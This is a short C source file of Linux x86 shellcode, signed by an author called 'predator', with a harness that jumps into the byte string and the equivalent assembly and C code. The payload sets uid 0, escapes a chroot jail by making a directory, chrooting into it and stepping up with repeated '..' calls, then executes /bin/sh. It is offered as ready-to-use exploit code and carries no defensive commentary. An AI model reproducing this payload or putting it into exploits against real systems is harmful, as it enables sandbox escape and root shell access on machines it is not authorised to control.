/* This is Linux chroot()/execve() code.It is 80 bytes long.I have some * * ideas how to make it smaller, but till then use this one. * * signed predator * * linux registered user : 181116 * * preedator(at)sendmail(dot)ru * ***************************************************************************/ char sc[]="\x31\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80\xeb\x36\x5e\x88\x46\x0a" "\x8d\x5e\x05\xb1\xed\xb0\x27\xcd\x80\x31\xc0\xb0\x3d\xcd\x80\x83" "\xc3\x02\xb0\x0c\xcd\x80\xe0\xfa\xb0\x3d\xcd\x80\x89\x76\x08\x31" "\xc0\x88\x46\x07\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x89\xc2\xb0\x0b" "\xcd\x80\xe8\xc5\xff\xff\xff/bin/sh.."; int main(){ int *ret=(int *)(&ret+2); printf("len : %d\n",strlen(sc)); *ret=(int)sc; } // Asm code /********************************************* *int main(){ * * __asm__(" xorl %eax,%eax \n" * * " xorl %ebx,%ebx \n" * * " xorl %ecx,%ecx \n" * * " movb $0x17,%al \n" * * " int $0x80 \n" * * " jmp 0x36 \n" * * " popl %esi \n" * * " movb %al,0xa(%esi) \n" * * " leal 0x5(%esi),%ebx \n" * * " movb $0xed,%cl \n" * * " movb $0x27,%al \n" * * " int $0x80 \n" * * " xorl %eax,%eax \n" * * " movb $0x3d,%al \n" * * " int $0x80 \n" * * " addl $0x2,%ebx \n" * * " movb $0xc,%al \n" * * " int $0x80 \n" * * " loopne -0x06 \n" * * " movb $0x3d,%al \n" * * " int $0x80 \n" * * " movl %esi,0x8(%esi) \n" * * " xorl %eax,%eax \n" * * " movb %al,0x7(%esi) \n" * * " movl %eax,0xc(%esi) \n" * * " movl %esi,%ebx \n" * * " leal 0x8(%esi),%ecx \n" * * " movl %eax,%edx \n" * * " movb $0xb,%al \n" * * " int $0x80 \n" * * " call -0x3b \n" * * " .string \"/bin/sh..\" \n"); * *} * *********************************************/ //C code /********************************************** *int main(){ * * char *sh[2]={"/bin/sh",NULL}; * * int gg=0xed * * mkdir("sh..",gg); * * chroot("sh.."); * * while (gg!=0){ * * chdir("..");gg--; * * } * * chroot(".."); * * execve(sh[0],sh,NULL); * *} * ***********************************************/